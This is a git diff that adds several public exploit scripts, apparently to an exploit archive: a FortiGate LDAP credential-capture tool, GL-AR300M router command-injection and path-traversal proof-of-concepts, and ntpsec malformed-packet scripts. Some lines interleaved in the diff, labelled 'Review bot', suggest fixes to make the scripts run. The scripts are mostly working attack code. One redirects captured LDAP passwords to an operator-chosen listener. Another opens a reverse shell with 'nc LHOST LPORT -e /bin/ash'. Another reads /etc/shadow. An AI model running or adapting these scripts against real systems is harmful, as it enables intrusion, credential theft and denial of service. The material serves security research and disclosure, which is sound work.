diff --git a/exploits/hardware/webapps/46171.py b/exploits/hardware/webapps/46171.py
new file mode 100755
index 000000000..38f12d48a
--- /dev/null
+++ b/exploits/hardware/webapps/46171.py
@@ -0,0 +1,144 @@ +#/usr/bin/python3 + +""" +CVE-2018-13374 +Publicado por Julio Ureña (PlainText) +Twitter: @JulioUrena +Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/ +Referencia: https://fortiguard.com/psirt/FG-IR-18-157 + +Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP +Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080 +""" + +from threading import Thread +from time import sleep +import json, requests, socket, sys, re, click + +# Disable SSL Warning +requests.packages.urllib3.disable_warnings() + +# To keep the Cookies after login. +s = requests.Session() + +def AccessFortiGate(fortigate_url, username, password, proxy_addr): + url_login = fortigate_url+'/logincheck' + + # Pass username and Password + payload = {"ajax": 1, "username":username, "secretkey":password} + + # verify=False - to avoid SSL warnings + r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False) + + if s.cookies: + return True + else: + return False + + +def TriggerVuln(fortigate_url, ip, proxy_addr): + print("[+] Triggering Vulnerability") + # Access LDAP Server TAB + r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False) + + # Load the response in a json object + json_data = json.loads(r.text) + + # Assign values based on FortiGate LDAP configuration + name = json_data['source'][0]['name'] + username = json_data['source'][0]['username'] + port = int(json_data['source'][0]['port']) + cnid = json_data['source'][0]['cnid'] + dn = json_data['source'][0]['dn'] + ca = json_data['source'][0]['ca-cert'] + + thread = Thread(target = GetCreds, args = (ip, port)) + thread.start() + sleep(1) + + print("[+] Username: ", username) + + # Create json object for the vulnerable request, changing the server and setting up secure to 0 + ldap_request = 
{"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}} + + # Trigger the vulnerability + r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False) + r.close() + +def GetCreds(server, port): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + + server_address = (server, port) + sock.bind(server_address) + + sock.listen() + credentials = '' + + while True: + print('[+] Waiting Fortigate connection ...') + c, client_address = sock.accept() + try: + while True: + data = c.recv(1024) + credentials = str(data) + # \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference. + # It separe the username and the password + ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","") + print("[+] Password: ", ldap_pass[3:-1]) + break + finally: + c.shutdown(socket.SHUT_RDWR) + c.close() + sock.shutdown(socket.SHUT_RDWR) + sock.close() + + if credentials: + break + +def print_help(self, param, value): + if value is False: + return + click.echo(self.get_help()) + self.exit() + +@click.command() +@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True) +@click.option('-u', '--username', 'username', help='Username to login into Fortigate. 
It can be a read only user.', required=True) +@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True) +@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True) +@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False) +@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False) +@click.pass_context + + +def main(self, fortigate_url, username, password, ip, proxy): + if not fortigate_url and not username and not password: + print_help(self, None, value=True) + print("[-] For usage reference use --help") + exit(0) + + # Configure Proxy For Web Requests + proxy_addr = { + 'http': proxy, + 'https': proxy + } + message = """[+] CVE-2018-13374 +[+] Publicado por Julio Ureña (PlainText) +[+] Blog: https://plaintext.do +[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157 +""" + print(message) + + if AccessFortiGate(str(fortigate_url),username, password, proxy_addr): + print("[+] Logged in.") + sleep(1) + TriggerVuln(str(fortigate_url), ip, proxy_addr) + else: + print("[-] Unable to login. Please check the credentials and Fortigate URL.") + exit(0) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/46179.txt b/exploits/hardware/webapps/46179.txt new file mode 100644 index 000000000..e03fa1f4e --- /dev/null +++ b/exploits/hardware/webapps/46179.txt 
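Review bot: The shebang on the first added line is `#/usr/bin/python3` — the `!` is missing, so despite the 100755 mode the file cannot be run directly; it should read `#!/usr/bin/python3`. The `--help` option is registered with `is_eager=False`, but click only runs a help callback before the `required=True` options are validated when the option is eager, so `-h` on its own is rejected with a missing-option error; use `is_eager=True`. On the login-failure branch `main` calls `exit(0)`, reporting success to the shell; `sys.exit(1)` is the correct status there. Every request is sent with `verify=False` and urllib3 warnings disabled, which means the operator's own FortiGate admin credentials travel over an unverified TLS connection; a header comment such as `# NOTE: certificate verification is disabled - run only against a lab/trusted network` makes that trade-off visible to whoever reuses the script.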
@@ -0,0 +1,76 @@ +# Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal +# Date: 15/1/2019 +# Exploit Author: Pasquale Turi aka boombyte +# Vendor Homepage: https://www.gl-inet.com/ +# Software Link: https://www.gl-inet.com/products/gl-ar300m/ +# Version: Firmware version 2.27 +# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 + + +#CVE-2019-6272 PoC (Command injection): + +import requests + +rhost='RHOST' +lhost='LHOST' +lport ='LPORT' +password='PASSWORD' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) + + +#CVE-2019-6273 (Arbitrary file download) PoC: + +import requests + +rhost='RHOST' +password='PASSWORD' +file_path='/etc/shadow' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) +print r4.text + + +#CVE-2019-6274 (Path Trasversal) PoC: + +import requests + +rhost='RHOST' +password='PASSWORD' +path='/' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) 
+header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) +print r4.text + + +#CVE-2019-6275 (Another command injection): + +import requests + +rhost='RHOST' +lhost='LHOST' +lport ='LPORT' +password='PASSWORD' +r=requests.get('http://'+rhost+'/login.html') +cookie=r.cookies +r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) +header={'X-CSRF-TOKEN':r2.text[13:45]} +r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) +header={'X-CSRF-TOKEN':r3.text[31:63]} +r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) +print r4.text \ No newline at end of file diff --git a/exploits/hardware/webapps/46180.html b/exploits/hardware/webapps/46180.html new file mode 100644 index 000000000..72c78d71f --- /dev/null +++ b/exploits/hardware/webapps/46180.html @@ -0,0 +1,32 @@ + + + + +
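Review bot: All four snippets use the Python 2 print statement (`print r4.text`), yet nothing in the header says which interpreter they were written for, so a reader pasting them into Python 3 hits a SyntaxError before the first request; add `# Tested with: Python 2.7` (or whatever the author used) to the header block. `RHOST`, `LHOST`, `LPORT` and `PASSWORD` are bare placeholder strings that are never checked, so a forgotten placeholder silently produces a request to the literal host `RHOST`; a one-line comment marking them as values to fill in would avoid that confusion.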
+ + + + \ No newline at end of file diff --git a/exploits/linux/dos/46175.py b/exploits/linux/dos/46175.py new file mode 100755 index 000000000..7db3fbd01 --- /dev/null +++ b/exploits/linux/dos/46175.py 
@@ -0,0 +1,111 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-oobread1 +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: ntpsec 1.1.1, 1.1.2 +# CVE: CVE-2019-6443 +# Note: this PoC does not crash the target + +import sys +import socket + +buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" + + "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" + + "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" + + "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" + + "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + 
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + 
"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" + + "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + 
"\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" + + "\x0b\x07") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) + + + + + +Magnus \ No newline at end of file diff --git a/exploits/linux/dos/46176.py b/exploits/linux/dos/46176.py new file mode 100755 index 000000000..d44fac107 --- /dev/null +++ b/exploits/linux/dos/46176.py 
@@ -0,0 +1,56 @@ +#!/usr/bin/env python +# Exploit Title: ntpsec 1.1.2 OOB read Proof of concept +# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman) +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: https://dumpco.re/bugs/ntpsec-oobread2 +# Vendor Homepage: https://ntpsec.org/ +# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz +# Affected versions: ntpsec 1.1.1, 1.1.2 +# CVE: CVE-2019-6444 +# Note: this PoC does not crash the target + +import sys +import socket + +buf = ("\x8e\x0a\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73" + + "\x6b\xc3\x80\x00\x00\x00\x00\x00\x02\x48\x47\x50\x53\x73\xdd\xb5" + + "\xc9\x64\xcf\x8a\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x44\x47\x50\x10\x00\x47\xb5\xc9\xcf\x97\xbb\x00\xe5\xf8\xdd" + + "\xb5\xc9\x6b\xd8\x7f\x81\xc2\xdd\xb5\xc9\x6b\xdd\x80\xe4\xe4\xe5" + + "\x9f\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x21\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\xc5\xbf\xbc\x6b\xd8\x7f\x82\x00\x2b\x2b\x2b\x2b" + + 
"\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x42\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\xed\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x00\x00\xe4\xe4\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x00" + + "\x01\x00\x00\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x29\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b" + + "\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x97\x48\xdd\xb5\xc9\x6b" + + "\xbb\xe8\x08\xf8\xdd\xba\xc9\x6b\xd8\x7f\x82\xc2\xdd\xb5\xc9\x6b" + + "\xd8\x80\x57\x9f") + +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(buf, ('127.0.0.1', 123)) \ No newline at end of file diff --git a/exploits/linux/dos/46177.py b/exploits/linux/dos/46177.py new file mode 100755 index 000000000..474bc7356 --- /dev/null +++ b/exploits/linux/dos/46177.py 
@@ -0,0 +1,20 @@
+#!/usr/bin/env python
+# Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
+# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
+# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
+# Website: https://dumpco.re/bugs/ntpsec-authed-npe
+# Vendor Homepage: https://ntpsec.org/
+# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
+# Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
+# CVE: CVE-2019-6445
+# Note: this PoC uses Keyid 1 with password 'gurka'
+
+import sys
+import socket
+
+buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
+ "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
+ "\x56\xc8\x07\xd4")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.sendto(buf, ('127.0.0.1', 123))
\ No newline at end of file
diff --git a/exploits/linux/dos/46178.py b/exploits/linux/dos/46178.py
new file mode 100755
index 000000000..5ca0be959
--- /dev/null
+++ b/exploits/linux/dos/46178.py
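Review bot: `buf` is a plain `str` literal passed straight to `sock.sendto`, which only works on Python 2; under Python 3, where `#!/usr/bin/env python` commonly resolves today, the call raises `TypeError: a bytes-like object is required`, so the header should pin the interpreter (e.g. `# Requires: Python 2`) or the shebang should be `#!/usr/bin/env python2`. The same applies to 46175.py, 46176.py and 46178.py in this commit. 46175.py additionally ends with a stray bare identifier `Magnus` after the `sendto` call, which raises `NameError` under any interpreter once the packet has been sent, and 46178.py's header line `# Note: this PoC uses Keyid 1 with password ‘gurka’` contains non-ASCII curly quotes without a `# -*- coding: utf-8 -*-` declaration, which Python 2 rejects with a SyntaxError (PEP 263) before executing anything. `import sys` is unused in all four files.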
